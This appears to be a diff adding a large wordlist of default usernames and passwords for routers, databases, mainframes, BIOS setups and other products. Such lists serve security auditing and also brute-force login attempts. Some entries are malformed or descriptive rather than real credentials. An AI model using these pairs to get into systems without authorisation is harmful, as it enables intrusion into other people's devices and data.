+user user
+user 
+Cisco Cisco
+Manager Manager
+DTA TJM
+apc apc
+tech 
+ cisco
+User 
+root 1234
+Admin 
+ letmein
+cablecom router
+adm 
+wradmin trancell
+ ascend
+manager friend
+ NetICs
+root blender
+netscreen netscreen
+ sysadm
+ SKY_FOX
+sa 
+ public
+ Master
+setup setup
+root default
+ laflaf
+cmaker cmaker
+enable 
+MICRO RSX
+login admin
+ Posterie
+write private
+root attack
+monitor monitor
+ private
+ xdfk9874t3
+netopia netopia
+ Col2ogro2
+admin microbusiness
+op op
+adminview OCS
+op operator
+admin secure
+admin atlantis
+sysadmin sysadmin
+super 5777364
+echo echo
+craft 
+adm cascade
+admin default
+maint maint
+comcast 1234
+CSG SESAME
+diag danger
+readonly lucenttech2
+admin operator
+Manager 
+debug d.e.b.u.g
+admin hello
+ SYSTEM
+root ascend
+root calvin
+manuf xxyyzz
+cusadmin highspeed
+admin 123
+smc smcadmin
+admin Sharp
+root password
+sweex mysweex
+disttech 4tas
+su super
+admin system
+root changeme
+poll tech
+sysadmin password
+SYSDBA masterkey
+anonymous 
+ 0000
+root permit
+admin barricade
+support support
+root tslinux
+admin hp.com
+recovery recovery
+USERID PASSW0RD
+eng engineer
+administrator administrator
+admin pwp
+admin isee
+NETWORK NETWORK
+JDE JDE
+admin superuser
+Guest 
+ Super
+admin admin123
+super surt
+rwa rwa
+admin 123456
+admin NetCache
+ ADTRAN
+USER USER
+test test
+admin extendnet
+admin ironport
+lp lp
+ Cisco
+administrator 
+admin 1111
+sysadmin PASS
+ro ro
+admin Ascend
+ _Cisco
+MAIL MAIL
+ami 
+ sitecom
+hsa hsadb
+system password
+MGR CAROLIAN
+ADMINISTRATOR ADMINISTRATOR
+admin sysAdmin
+root tini
+admin smcadmin
+ Helpdesk
+FIELD SERVICE
+PBX PBX
+netman 
+HELLO FIELD.SUPPORT
+system sys
+hscroot abc123
+1502 1502
+ star
+superuser admin
+HELLO MGR.SYS
+sysadm anicust
+Administrator Administrator
+netrangr attack
+ Intel
+ 12345
+readwrite lucenttech1
+ secret
+piranha piranha
+wlse wlsedb
+admin cisco
+l3 l3
+admin diamond
+none admin
+naadmin naadmin
+public public
+admin 1988
+admin radius
+admin root
+NETOP 
+Administrator letmein
+HELLO MANAGER.SYS
+ raidzone
+ 3ascotel
+MANAGER HPOFFICE
+demo demo
+ 166816
+User Password
+admin zoomadsl
+D-Link D-Link
+user public
+user pass
+l2 l2
+MGR CCC
+rw rw
+cgadmin cgadmin
+storwatch specialist
+ secure
+vcr NetVCR
+OPERATOR COGNOS
+piranha q
+admin synnet
+MDaemon MServer
+root cms500
+root davox
+jagadmin 
+enquiry enquirypw
+at4400 at4400
+support h179350
+davox davox
+admin asd
+PFCUser 240653C9467E45
+setup changeme
+superuser superuser
+ atc123
+aaa 
+root admin_1
+ 266344
+MGR WORD
+topicalt password
+admin2 changeme
+1234 1234
+MANAGER ITF3000
+ connect
+FIELD HPONLY
+nms nmspw
+client client
+admin comcomcom
+ speedxess
+MGR ROBELLE
+ epicrouter
+sys uplink
+OPERATOR SYSTEM
+field support
+MGR SYS
+root letacla
+ FORCE 
+deskman changeme
+MAIL REMOTE
+SYSADM sysadm
+superadmin secret
+ backdoor
+pmd 
+MGR CNAS
+admin 22222
+GEN2 gen2
+ medion
+ADMN admn
+Factory 56789
+PRODDTA PRODDTA
+tellabs tellabs#1
+spcl 0
+dadmin dadmin01
+ comcomcom
+administrator password
+helpdesk OCS
+dhs3mt dhs3mt
+MGR SECURITY
+setup changeme!
+install llatsni
+adfexc adfexc
+IntraSwitch Asante
+manage !manage
+superman 21241036
+MANAGER TELESUP
+craft crftpw
+login 0
+ help
+MGR HPOFFICE
+ lantronix
+SPOOLMAN HPOFFICE
+manager admin
+ netadmin
+ADVMAIL HP
+FIELD SUPPORT
+MANAGER SYS
+MGR VESOFT
+vt100 public
+PSEAdmin $secure$
+HELLO OP.OPERATOR
+Manager friend
+ hs7mwxkk
+patrol patrol
+ SUPER
+ SMDR
+ 1064
+teacher password
+PCUSER SYS
+MGR ITF3000
+Any 12345
+OPERATOR DISC
+RSBCMON SYS
+cellit cellit
+MGR INTX3
+inads inads
+halt tlah
+root wyse
+locate locatepw
+admin visual
+TMAR#HWMT8007079 
+rapport r@p8p0r+
+MGR TELESUP
+xbox xbox
+ TENmanUFactOryPOWER
+device device
+NICONEX NICONEX
+admin admin1234
+root fivranne
+acc acc
+31994 31994
+admin netadmin
+bcim bcimpw
+websecadm changeme
+blue bluepw
+topicnorm password
+supervisor PlsChgMe
+ R1QTPS
+MGR HPONLY
+ccrusr ccrusr
+root Cisco
+login password
+266344 266344
+MAIL MPE
+telecom telecom
+MAIL HPOFFICE
+GEN1 gen1
+Administrator smcadmin
+SSA SSA
+ snmp-Trap
+HTTP HTTP
+ default
+mtch mtch
+admin adslolitec
+Administrator ganteng
+bciim bciimpw
+browse browsepw
+Admin Admin
+ Password
+hydrasna 
+sys change_on_install
+deskres password
+bbsd-client changeme2
+anonymous Exabyte
+admin rmnetlm
+replicator replicator
+intel intel
+OPERATOR SUPPORT
+MGR HPP196
+radware radware
+intermec intermec
+mlusr mlusr
+MGR RJE
+FIELD LOTUS
+init initpw
+e250 e250changeme
+MAIL TELESUP
+Polycom SpIp
+temp1 password
+ adminttd
+tech field
+support supportpw
+mac 
+ MiniAP
+MANAGER SECURITY
+3comcso RIP000
+RMUser1 password
+WP HPOFFICE
+Administrator changeme
+MGR XLSERVER
+MGR HPP187
+MGR HPP189
+inads indspw
+admin linga
+craft craft
+ enter
+NAU NAU
+rcust rcustpw
+admin AitbISP4eCiG
+mtcl mtcl
+MGR CONV
+topicres password
+bcnas bcnaspw
+MGR NETBASE
+admin access
+public 
+adminuser OCS
+MGR REGO
+Root 
+cac_admin cacadmin
+mediator mediator
+superman talent
+Anonymous 
+kermit kermit
+admin x-admin
+MGR HPDESK
+ 9999
+root ROOT500
+admin my_DEMARC
+volition volition
+GlobalAdmin GlobalAdmin
+ 4getme2
+LUCENT01 UI-PSWD-01
+admin 2222
+LUCENT02 UI-PSWD-02
+MANAGER TCH
+adminstat OCS
+desknorm password
+IntraStack Asante
+OPERATOR SYS
+MGR COGNOS
+ Fireport
+ ILMI
+maint maintpw
+supervisor supervisor
+e500 e500changeme
+admin mu
+MANAGER COGNOS
+deskalt password
+admin OCS
+bbsd-client NULL
+cust custpw
+admin noway
+tiara tiaranet
+bcms bcmspw
+ TANDBERG
+m1122 m1122
+telco telco
+superuser 
+xd xd
+dhs3pms dhs3pms
+VNC winterm
+craft craftpw
+maint rwmaint
+anonymous any@
+login access
+browse looker
+customer none
+cisco cisco
+adminstrator changeme
+FIELD MANAGER
+ 1234admin
+FIELD MGR
+ftp_nmc tuxalize
+me 
+iclock timely
+echo User
+ADVMAIL HPOFFICE DATA
+login 1111
+login 8429
+Administrator manage
+ Babylon
+admin hagpolm1
+root 12345
+scmadmin scmchangeme
+user tivonpw
+sysadm Admin
+Administrator password
+admin administrator
+installer installer
+webadmin webadmin
+ftp_inst pbxk1064
+DDIC 19920706
+ pento
+admin NetSurvibox
+SYSTEM D_SYSTPW
+draytek 1234
+ 3477
+operator $chwarzepumpe
+administrator asecret
+EARLYWATCH SUPPORT
+ 10023
+Manager Admin
+super.super 
+ftp_oper help1954
+corecess corecess
+superuser 123456
+admin Password
+super.super master
+admin Protector
+SYSTEM MANAGER
+webadmin 1234
+install secret
+FIELD HPWORD PUB
+admin 12345
+admin symbol
+weblogic weblogic
+Admin 1988
+system/manager sys/change_on_install
+root 3ep5w2u
+ 8111
+ jannie
+End User 123
+none 0
+d.e.b.u.g User
+admin tomcat
+target password
+Administrator pilou
+MD110 help
+Administrator 3ware
+ ANYCOM
+tiger tiger123
+adminttd adminttd
+admin asante
+admin smallbusiness
+admin netscreen
+FIELD HPP187 SYS
+guest User
+maint ntacdmax
+admin w2402
+wlseuser wlsepassword
+SAPCPIC admin
+ftp_admi kilo1987
+admin articon
+mtcl 
+default.password 
+admin michelangelo
+manager changeme
+root Mau'dib
+ Serial Num
+root ggdaseuaimhrke
+7 maintain
+2 syslib
+ADMIN admin
+system weblogic
+Administrator ggdaseuaimhrke
+ADMIN 
+itsadmin init
+PUBSUB PUBSUB
+admin demo
+system manager
+sys sys
+CTXSYS CTXSYS
+ftp 
+bill bill
+192.168.1.1 60020 @dsl_xilno
+FIELD 
+admin dmr99
+setpriv system
+GUEST GUEST
+SAP* 06071992
+operator 1234
+t3admin Trintech
+hello hello
+supervisor 
+CISCO15 otbu+1
+1.79 Multi
+ babbit
+mso w0rkplac3rul3s
+Telecom Telecom
+qsysopr qsysopr
+admin TANDBERG
+admin imss7.0
+ nokia
+APPS APPS
+Developer isdev
+mail mail
+admin draadloos
+qsecofr qsecofr
+11111 x-admin
+ default.password
+Service 5678
+enable cisco
+netadmin nimdaten
+Polycom 456
+admin P@55w0rd!
+admin 1234admin
+root par0t
+any system
+db2fenc1 db2fenc1
+johnson control
+2 maintain
+isp isp
+demos 
+QSRV QSRV
+root iDirect
+MDSYS MDSYS
+Admin 123456
+2 manager
+vpasp vpasp
+TEST TEST
+ Telecom
+QSECOFR QSECOFR
+adm none
+ 2501
+1 syslib
+system security
+admin leviton
+!root blank
+informix informix
+root mpegvideo
+5 games
+root 0P3N
+engmode hawk201
+scout scout
+qpgmr qpgmr
+admin admin000
+ADSL expert03
+cisco 
+images images
+admin security
+admin surecom
+Gearguy Geardog
+ symantec
+comcast 
+admin adslroot
+1 manager
+Demo 
+ xyzzy
+Administrator adaptec
+system system
+SAP* PASS
+serial# serial#
+BACKUP BACKUP
+stratacom stratauser
+root rootme
+6.x 
+root !root
+webadmin webibm
+ riverhead
+mary password
+COMPANY COMPANY
+SYS SYS
+DSL DSL
+Jetform 
+none amber
+eagle eagle
+ROUTER 
+root brightmail
+admin pass
+ HEWITT RAND
+ods ods
+siteadmin toplayer
+admin OkiLAN
+root rootpass
+Alphanetworks wrgg15_di524
+ x40rocks
+ nokai
+Admin1 Admin1
+field field
+Admin admin
+Admin ImageFolio
+ iolan
+ manager
+admin pfsense
+janta sales janta211
+servlet manager
+username password
+citel password
+Replicator iscopy
+SYSMAN OEM_TEMP
+1 operator
+SYSTEM SYSTEM
+administrator RSAAppliance
+master themaster01
+Admin 1234
+2 operator
+SUPERUSER ANS#150
+admin passwort
+cn=orcladmin welcome
+30 games
+maintainer admin
+setup 
+ hello
+admin NetSeq
+BRIO_ADMIN BRIO_ADMIN
+ citel
+internal oracle
+CQSCHEMAUSER PASSWORD
+root kn1TG7psLu
+SYS SYSPASS
+ lkwpeter
+DEV2000_DEMOS DEV2000_DEMOS
+FSFTASK1 
+checkfs checkfs
+BACKUP 
+USER1 USER1
+root TENmanUFactOryPOWER
+SQLDBA 
+root resumix
+HELP HELP
+toor logapp
+SYS 0RACLE9
+SYS 0RACLE8
+ 57gbzb
+!root none
+qsrvbas qsrvbas
+SYSADMIN 
+EZsetup 
+Administrator 1234
+ sldkj754
+BATCH 
+STRAT_USER STRAT_PASSWD
+Administrator 19750407
+ User
+user USERP
+primenet primeos
+OEMREP OEMREP
+admin [^_^]
+USER6 USER6
+lynx 
+ TTPTHA
+powerdown powerdown
+root Mau’dib
+SYSTEM ORACL3
+$ALOC$ 
+password 
+VOL-0215 
+admin nimda
+tomcat tomcat
+REP_MANAGER DEMO
+WinCCConnect 2WSXcder
+ALLIN1 ALLIN1
+DIRMAINT 
+eqadmin  Serial port only equalizer
+sysadm sysadmpw
+QSRVBAS QSRVBAS
+admin ip305Beheer
+debug tech
+ ACCORD
+AQJAVA AQJAVA
+LASERWRITER LASERWRITER
+Administrator 0000
+root nsi
+PERFSTAT PERFSTAT
+apcuser apc
+MBWATCH MBWATCH
+ protection
+system_admin 
+unix unix
+OWNER OWNER
+NETPRIV NETPRIV
+VSEMAINT 
+ AWARD?SW
+DEMO DEMO
+tomcat changethis
+SYMPA SYMPA
+REP_OWNER REP_OWNER
+DCL DCL
+FAX 
+root dbps
+ARCHIVIST ARCHIVIST
+USER PASSWORD
+VTAMUSER 
+LASERWRITER 
+VMTAPE 
+basisk basisk
+NetLinx password
+OutOfBox demos guest 4DGifts (none by default)
+none letmein
+NETMGR NETMGR
+DEFAULT USER
+OAS_PUBLIC OAS_PUBLIC
+read 
+AP AP
+demos demos
+SYSTEM Admin
+admin j5Brn9
+MTSSYS MTSSYS
+SYSMAINT DIGITAL
+AUDIOUSER AUDIOUSER
+Joe hello
+IDMS 
+ teX1
+admin allot
+$SRV $SRV
+snake 
+SYS 0RACLE
+ADVMAIL 
+Administrator nicecti
+ROOT ROOT
+PRINTER PRINTER
+shutdown 
+satan 
+ m1link
+RDM470 
+master access
+ l2
+ l1
+trouble trouble
+fax 
+OP1 
+admin@example.com admin
+root trendimsa1.0
+HOST HOST
+ADLDEMO ADLDEMO
+QS_ADM QS_ADM
+bin sys
+ AMI
+OPER OPER
+oracle 
+jj 
+PO7 PO7
+SYSTEM 0RACLE8
+SYSTEM 0RACLE9
+www 
+joe password
+ komprie
+ 123
+MAINT MAINT
+CMSBATCH 
+root toor
+CCC 
+role1 tomcat
+DATAMOVE 
+lp 
+ AMISETUP
+ sp99dd
+halt halt
+MSHOME MSHOME
+ISPVM 
+crowd­-openid-­server password
+user_editor demo
+sedacm secacm
+ROOT 
+Admin 3Com
+db2admin db2admin
+Airaya Airaya
+supervisor visor
+none Wireless
+SYSDUMP1 
+IMEDIA IMEDIA
+ Biostar
+install install
+primos_cs primos
+admin infrant1
+Administrator Partner
+ Administrative
+USER_TEMPLATE USER_TEMPLATE
+pnadmin pnadmin
+ h6BB
+lpadmin lpadmin
+guest none
+VTAM VTAM
+TRACESVR TRACE
+POSTMASTER POSTMASTER
+MAILER MAILER
+RSCSV2 
+QS_WS QS_WS
+ sma
+system_admin system_admin
+circ 
+Demo password
+ rwa
+nobody nobody
+Tasman Tasmannet
+admin !admin
+DISCOVERER_ADMIN DISCOVERER_ADMIN
+VMASMON 
+LR-ISDN LR-ISDN
+TURBINE TURBINE
+GL GL
+PO PO
+ AMI_SW
+super superpass
+PRINT 
+MODTEST YES
+GATEWAY GATEWAY
+root system
+PRIMARY PRIMARY
+both tomcat
+ award.sw
+haasadm lucy99
+pw pwpw
+games games
+DOCSIS_APP 3Com
+bbs 
+EMP EMP
+Admin cclfb
+postmaster 
+SITEMINDER SITEMINDER
+Any Any
+vgnadmin vgnadmin
+RJE RJE
+gonzo 
+NEWS NEWS
+sa Ektron
+ Award
+AQUSER AQUSER
+UTLBSTATU UTLESTAT
+ AMIAMI
+netbotz netbotz
+CTXSYS CHANGE_ON_INSTALL
+xmi_demo sap123
+ Crystal
+ Daewuu
+ftp ftp
+ORACACHE (random password)
+MCUser MCUser1
+prash hello
+sync 
+sysadm admpw
+root rootadmin
+PM PM
+AP2SVP 
+master master
+ibm 2222
+ULTIMATE ULTIMATE
+SABRE 
+role1 role1
+user_pricer demo
+admin enhydra
+SUPERVISOR NF
+EVENT EVENT
+ xyzall
+ rainbow
+ADMIN JETSPEED
+SYS ORACL3
+PORTAL30_SSO_PS PORTAL30_SSO_PS
+FSFADMIN 
+OO OO
+WKSYS WKSYS
+OPERATNS OPERATNS
+ ksdjfg934t
+UVPIM_ 
+ merlin
+OE OE
+Any Local User Local User password
+OCITEST OCITEST
+web 
+ HLT
+ADMINISTRATOR admin
+ESSEX 
+ last
+CTXSYS 
+None xyzzy
+CTXDEMO CTXDEMO
+user_designer demo
+ Admin
+ zebra
+QDBA QDBA
+role changethis
+LRISDN LRISDN
+tele tele
+WEBCAL01 WEBCAL01
+rsadmin rsadmin
+OMWB_EMULATION ORACLE
+root alien
+WINDOWS_PASSTHRU 
+ sanfran
+public ReadOnly access secret
+ AMIPSWD
+MOREAU MOREAU
+fast abd234
+root QNX
+host dnnhost
+administrator root
+admin public
+SYSTEM ORACLE
+ sertafu
+ORDPLUGINS ORDPLUGINS
+SYSWRM 
+mail 
+ telos
+ADMIN ADMIN
+administrator adminpass
+savelogs crash
+ ACCESS
+SDOS_ICSAP SDOS_ICSAP
+system adminpwd
+BATCH BATCH
+GUEST GUESTGUEST
+SYSMAINT SYSMAINT
+postmaster postmast
+DSSYS DSSYS
+ award_ps
+ ZAAADA
+MGWUSER MGWUSER
+ NTCIP
+OPERATOR 
+ hewlpack
+TDOS_ICSAP TDOS_ICSAP
+ssp ssp
+EJSADMIN EJSADMIN
+ damin
+INGRES INGRES
+DS 
+ A.M.I
+estheralastruey 
+ 1322222
+VCSRV VCSRV
+Administrator storageserver
+ssladmin ssladmin
+CLARK CLOTH
+shutdown shutdown
+administrator 1234
+OEMADM OEMADM
+restoreonly restoreonly1
+quser quser
+PRINTER 
+MILLER MILLER
+trmcnfg trmcnfg
+REPORT REPORT
+user_author demo
+ aLLy
+dpn changeme
+tour tour
+mountfsys mountfsys
+http 
+PROG PROG
+ iwill
+openfiler password
+ Public
+admin mp3mystic
+RAID hpt
+read synnet
+admin peribit
+STARTER STARTER
+FAXUSER 
+GUEST GUESTGUE
+DSA 
+ guardone
+daemon daemon
+mountsys mountsys
+SYSTEM ORACLE9
+SYSTEM ORACLE8
+ gandalf
+backuponly backuponly1
+IVPM1 
+ leaves
+sysadm syspw
+root blablabla
+ Compleri
+USER3 USER3
+OPENSPIRIT OPENSPIRIT
+ spooml
+ changeit
+ wg
+prime primeos
+HPLASER 
+ Vextrex
+CSPUSER 
+qsvr qsvr
+lynx lynx
+SYSCKP 
+root letmein
+Sysop Sysop
+user_marketer demo
+IMAGEUSER IMAGEUSER
+root Password
+bsxuser bsxpass
+MASTER PASSWORD
+USER9 USER9
+root ax400
+OLAPSYS MANAGER
+SYSTEM OPERATOR
+oracle oracle
+root Mau?dib
+ MASTER
+root t00lk1t
+rsadmin 
+ Daytec
+OutOfBox 
+ SZYX
+ cmaker
+ CTX_123
+rje rje
+ODM_MTR MTRPW
+QS_ES QS_ES
+lansweeperuser mysecretpassword0*
+DEMO3 
+Username password
+GPLD GPLD
+uucp uucp
+DBSNMP DBSNMP
+VMARCH 
+GUEST TSEUG
+SWUSER SWUSER
+root 8RttoTriz
+VTAM 
+OPERATNS 
+Operator Operator
+CHEY_ARCHSVR 
+SYS ORACLE
+roo honey
+n.a guardone
+accounting accounting
+backuprestore backuprestore1
+PRINT PRINT
+ j322
+ Craftr4
+dni dni
+WEBADM password
+iceman 
+guru *3noguru
+FAX FAX
+anon anon
+ j256
+USER8 USER8
+root honey
+PORTAL30_SSO_PUBLIC PORTAL30_SSO_PUBLIC
+ 589721
+postgres 
+WINSABRE WINSABRE
+USERP USERP
+none public
+Admin shs
+SYS MANAGER
+IVPM2 
+PORTAL30_SSO PORTAL30_SSO
+ALLIN1MAIL ALLIN1MAIL
+POST 
+TEMP 
+ xo11nE
+admin nms
+SYSADM SYSADM
+BATCH1 
+me me
+SUPERVISOR NFI
+PROMAIL 
+SECDEMO SECDEMO
+ARAdmin AR#Admin#
+sadmin 
+ORAREGSYS ORAREGSYS
+VMASSYS 
+man 
+FROSTY SNOWMAN
+LASER LASER
+tutor 
+ ?award
+root changethis
+DISKCNT 
+default WLAN_AP
+SYSERR 
+WWW WWW
+VAX VAX
+none none
+ Cable-docsis
+PROCAL 
+SUPERVISOR SYSTEM
+FAXWORKS 
+ibm password
+CTXSYS UNKNOWN
+LDAP_Anonymous LdapPassword_1
+(any 3 chars) cascade
+games 
+User 1234
+ Zenith
+setup/snmp setup/nopasswd
+DSGATEWAY DSGATEWAY
+AWARD_SW 
+CSMIG CSMIG
+ year2000
+umountfsys umountfsys
+ BIGO
+root jstwo
+VMS VMS
+dni 
+bpel bpel
+viewuser viewuser1
+admin ISPMODE
+TDISK 
+politically correct
+user_analyst demo
+admin conexant
+guest 1234
+root logapp
+admin ip3000
+RSCS 
+COMPIERE COMPIERE
+OSP22 OSP22
+guest1 guest1
+FORSE FORSE
+ lesarotl
+factory factory
+bubba (unknown)
+admin ip20
+admin ip21
+LASER 
+QUSER QUSER
+ AWARD SW
+primeos prime
+admin tr650
+poll poll
+ j262
+ xljlbj
+glftpd glftpd
+ Advance
+RMAN RMAN
+mountfs mountfs
+DIRECT 
+ console
+firstsite firstsite
+ SW_AWARD
+IPFSERV 
+ snake
+Administrator Gateway
+TSUSER TSUSER
+BATCH2 
+admin 123123
+ 3098z
+ cc
+snmp nopasswd
+WebAdmin WebBoard
+IBMUSER SYS1
+SMART 
+voadmin manager
+BC4J BC4J
+core phpreactor
+OPERVAX OPERVAX
+Bobo hello
+ Congress
+ central
+WANGTEK WANGTEK
+disttech etas
+OWA OWA
+USER2 USER2
+jasperadmin jasperadmin
+FIELD DIGITAL
+root uClinux
+guest guestgue
+FAXUSER FAXUSER
+WINSABRE SABRE
+VMBSYSAD 
+admin ip400
+PVM 
+ctb_admin sap123
+ AMI.KEY
+ AMI.KEZ
+&nbsp; ANYCOM
+USER_TEMPLATE 
+DEMO4 
+ inuvik49
+QSRV 11111111
+qsrv qsrv
+superdba admin
+PORTAL30 PORTAL31
+PORTAL30 PORTAL30
+XPRT XPRT
+Crowd password
+User 19750407
+18364 
+ zjaaadc
+ilom-admin ilom-admin
+rdc123 rdc123
+sysopr sysopr
+tasman tasmannet
+SYSTEM 0RACLE8I
+ Cisco router
+admin store
+ SER
+blank blank
+ADMIN PASSWORD
+admin IP address
+WEBREAD WEBREAD
+ODM ODM
+11111111 11111111
+prime prime
+AURORA$ORB$UNAUTHENTICATED INVALID
+ADAMS WOOD
+root vertex25
+sys bin
+lp lineprin
+Craft crftpw
+www www
+postgres dbpass
+rfmngr $rfmngr$
+sync sync
+WANGTEK 
+ 1988
+MAINT 
+SYSTEST_CLIG SYSTEST
+user user0000
+user_approver demo
+ilom-operator ilom-operator
+Nice-admin nicecti
+ HELGA-S
+answer 
+NETNONPRIV NETNONPRIV
+nuucp 
+CIDS CIDS
+VASTEST 
+primenet primenet
+redline redline
+ rw
+spcl 0000
+admin muze
+MBMANAGER MBMANAGER
+webmaster 
+APPLSYS FND
+ ro
+WINDOWS_PASSTHRU WINDOWS_PASSTHRU
+USER4 USER4
+hqadmin hqadmin
+UOMNI_ 
+FIELD TEST
+sys system
+Admin 123qwe
+VMUTIL 
+POST BASE
+ dn_04rjc
+uucpadm uucpadm
+halt 
+FAXWORKS FAXWORKS
+admin password1
+EXFSYS EXFSYS
+4Dgifts 
+JMUSER JMUSER
+admin imsa7.0
+SUPERVISOR NETFRAME
+CIS CIS
+UNITY_ 
+ ciscofw
+HLW HLW
+admin brocade1
+pwrchute pwrchute
+ setup
+ Tiny
+IDMSSE 
+postgres svcPASS83
+NSA nsa
+!root !ishtar
+admin blank
+root NeXT
+TELEDEMO TELEDEMO
+ AMIDECOD
+recover recover
+TRAVEL TRAVEL
+lexar 
+ efmukl
+viewer 
+LIBRARY 
+admin raritan
+PO8 PO8
+root@localhost root
+NAMES NAMES
+secofr secofr
+PDMREMI 
+ biostar
+MGE VESOFT
+USER7 USER7
+OWA_PUBLIC OWA_PUBLIC
+questra questra
+builtin builtin
+SFCNTRL 
+SAP* 6071992
+boss boss
+anonymous password
+ isolation
+ Q54arwms
+PLEX PLEX
+OLAPDBA OLAPDBA
+ g6PJ
+OLAPSVR INSTANCE
+user_expert demo
+root pixmet2003
+Bhosda Lund
+TEST 
+qsvr ibmcel
+CMSBATCH CMSBATCH
+ ABCD
+gropher 
+ AM
+administrator admin
+ condo
+ Toshiba
+ familymacintosh
+TAHITI TAHITI
+NEWINGRES NEWINGRES
+ AMI?SW
+ mMmM
+man man
+VM3812 
+root powerapp
+ibm service
+VIF_DEVELOPER VIF_DEV_PWD
+ADMIN WELCOME
+Admin Barricade
+joeuser joeuser
+system isp
+IPC 
+HELPDESK HELPDESK
+wlpisystem wlpisystem
+TSAFVM 
+prtgadmin prtgadmin
+SYSTEM CHANGE_ON_INSTALL
+ CONCAT
+ t0ch88
+webmaster webmaster
+ djonet
+ADMIN changeme
+Any 
+ Compaq
+UAMIS_ 
+theman changeit
+CISINFO CISINFO
+mobile dottie
+QS_CB QS_CB
+CDEMORID CDEMORID
+tech nician
+DEMO2 
+administrator none
+SYS MANAG3R
+End User 7936
+PORTAL30_PUBLIC PORTAL30_PUBLIC
+sysadmin nortel
+SYS D_SYSTPW
+SYSTEM SYSPASS
+Guest blank
+User User
+MDDEMO_CLERK CLERK
+FIELD FIELD
+Admin SECRET123
+Guest Guest
+PHANTOM 
+admin amigosw1
+ xmux
+write 
+ADMINISTRATOR SENTINEL
+system field
+ ducati900ss
+qsecofr 22222222
+ lkw peter
+ awkward
+ TzqF
+SYSTEST_CLIG SYSTEST_CLIG
+ODS ODS
+admin axis2
+BLAKE PAPER
+TSDEV TSDEV
+PRODBM 
+admin letmein
+ joh316
+dos dos
+login 0000
+APL2PP 
+system hdms
+admin phplist
+god1 12345
+admin novell
+CICSUSER CISSUS
+22222222 22222222
+root passw0rd
+user_publisher demo
+OSE$HTTP$ADMIN (random password)
+def trade
+SuperUser kronites
+QS_CBADM QS_CBADM
+SYSA SYSA
+ 00000000
+STUDENT STUDENT
+Draytek 1234
+SMDR SECONDARY
+EREP 
+VSEMAN 
+ OOOOOOOO
+primos_cs prime
+demo 
+fwadmin xceladmin
+ j64
+MTS_USER MTS_PASSWORD
+ AWARD_SW
+AQDEMO AQDEMO
+private ReadWrite access secret
+ GWrv
+ MagiMFP
+ SnuFG5
+IS_$hostname IS_$hostname
+HPSupport badg3r5
+ORASSO ORASSO
+GATEWAY 
+ t0ch20x
+CVIEW 
+SH SH
+ zeosx
+XXSESS_MGRYY X#1833
+ wodj
+ FOOBAR
+SYSMAN SYSMAN
+VMMAP 
+admin urchin
+PORTAL30_DEMO PORTAL30_DEMO
+Ezsetup 
+QS_CS QS_CS
+administrator PlsChgMe!
+CMSUSER 
+ MCUrv
+DEMO1 
+admin adminadmin
+userNotUsed userNotU
+ AMI~
+root ibm
+ncadmin ncadmin
+TESTPILOT TESTPILOT
+ Polrty
+fg_sysadmin password
+UETP UETP
+QS QS
+DBI MUMBLEFRATZ
+&nbsp; ILMI
+SYSTEM SYS
+JWARD AIROPLANE
+APPS_MRC APPS_MRC
+ uboot
+Moe hello
+SENTINEL SENTINEL
+admin netgear1
+Yak asd123
+PDP11 PDP11
+ aammii
+Flo hello
+SLIDE SLIDEPW
+root bagabu
+primeos primeos
+ Spacve
+ 256256
+INFO INFO
+checkfsys checkfsys
+PRODCICS PRODCICS
+ foolproof
+ AWARD_PW
+MXAGENT MXAGENT
+SYSTEM ORACLE8I
+admin no password
+VMTLIBR 
+POWERCARTUSER POWERCARTUSER
+VMBACKUP 
+CPNUC 
+ QDI
+ shiva
+distrib distrib0
+SUPERVISOR SUPERVISOR
+SYSMAINT SERVICE
+MIGRATE MIGRATE
+CDEMOUCB CDEMOUCB
+system prime
+QSRV 22222222
+ c
+OLTSEP 
+sysbin sysbin
+signa signa
+autocad autocad
+ SWITCHES_SW
+WEBDB WEBDB
+daemon 
+ aPAf
+ncrm ncrm
+SAMPLE SAMPLE
+ 1
+HCPARK HCPARK
+ALLINONE ALLINONE
+nm2user nm2user
+SAVSYS 
+IIPS 
+PATROL PATROL
+ technolgi
+ MBIU0
+mailadmin secret
+adm adm
+TMSADM 
+tutor tutor
+ESubscriber 
+CHEY_ARCHSVR CHEY_ARCHSVR
+write synnet
+software software
+admin welcome
+god2 12345
+bbs bbs
+ Dell
+disttech disttech
+FSFTASK2 
+ zbaaaca
+ prost
+ORDSYS ORDSYS
+Administrator administrator
+ 1234567890
+gopher gopher
+PSFMAINT 
+SYSTEM MANAG3R
+ RM
+ s!a@m#n$p%c
+EAdmin 
+12345 12345
+DECNET DECNET
+OPERATIONS OPERATIONS
+$system 
+REP_OWNER DEMO
+PANAMA PANAMA
+LIBRARIAN SHELVES
+SYSTEM 0RACLE
+fal 
+4Dgifts 4Dgifts
+ biosstar
+NETSERVER NETSERVER
+ tiny
+root TANDBERG
+POWERCHUTE APC
+USER5 USER5
+GPFD GPFD
+ 12345678
+blank admin
+QS_OS QS_OS
+sysadm admin
+REPADMIN REPADMIN
+Administrator 12345678
+0 0
+DEMO8 DEMO8
+DEMO9 DEMO9
+CDEMO82 CDEMO82
+admin boca raton
+Administrator vision2
+administrator 0
+umountsys umountsys
+snmp snmp
+Username PASSWORD
+volition 
+USER0 USER0
+CDEMOCOR CDEMOCOR
+SYSTEST UETP
+Rodopi Rodopi
+DECNET NONPRIV
+user_checker demo
+ tatercounter2000
+qserv qserv
+ ESSEX or IPC
+AQ AQ
+support 
+SAPR3 SAP
+VRR1 VRR1
+fastwire fw
+admi admin
+FINANCE FINANCE
+WinCCAdmin 2WSXcder
+ESTOREUSER ESTORE
+fax fax
+VIRUSER VIRUSER
+LINK LINK
+APPLSYSPUB FNDPUB
+ BIOS
+SYS ORACLE8
+SYS ORACLE9
+overseer overseer
+checksys checksys
+umountfs umountfs
+DBDCCICS DBDCCIC
+Admin password
+ x6zynd56
+TOAD TOAD
+root mozart
+ntpupdate ntpupdate
+root router
+MDDEMO_MGR MGR
+ARCHIVIST 
+SUPERVISOR HARRIS
+ 11111
+billy-bob 
+lp bin
+DECMAIL DECMAIL
+alien alien
+admin dnnadmin
+nsroot nsroot
+AdvWebadmin advcomm500349
+dvstation dvst10n
+SERVICECONSUMER1 SERVICECONSUMER1
+MMO2 MMO2
+qsecofr 11111111
+NOC NOC
+WWWUSER WWWUSER
+root  Serial port only 
+SAP SAPR3
+root t0talc0ntr0l4!
+NEVIEW 
+MAIL 
+ODSCOMMON ODSCOMMON
+fal fal
+pixadmin pixadmin
+ripeop 
+PENG 
+ BIOSPASS
+netlink netlink
+L2LDEMO L2LDEMO
+OUTLN OUTLN
+12.x 
+scott tiger or tigger
+ toshy99
+dbase dbase
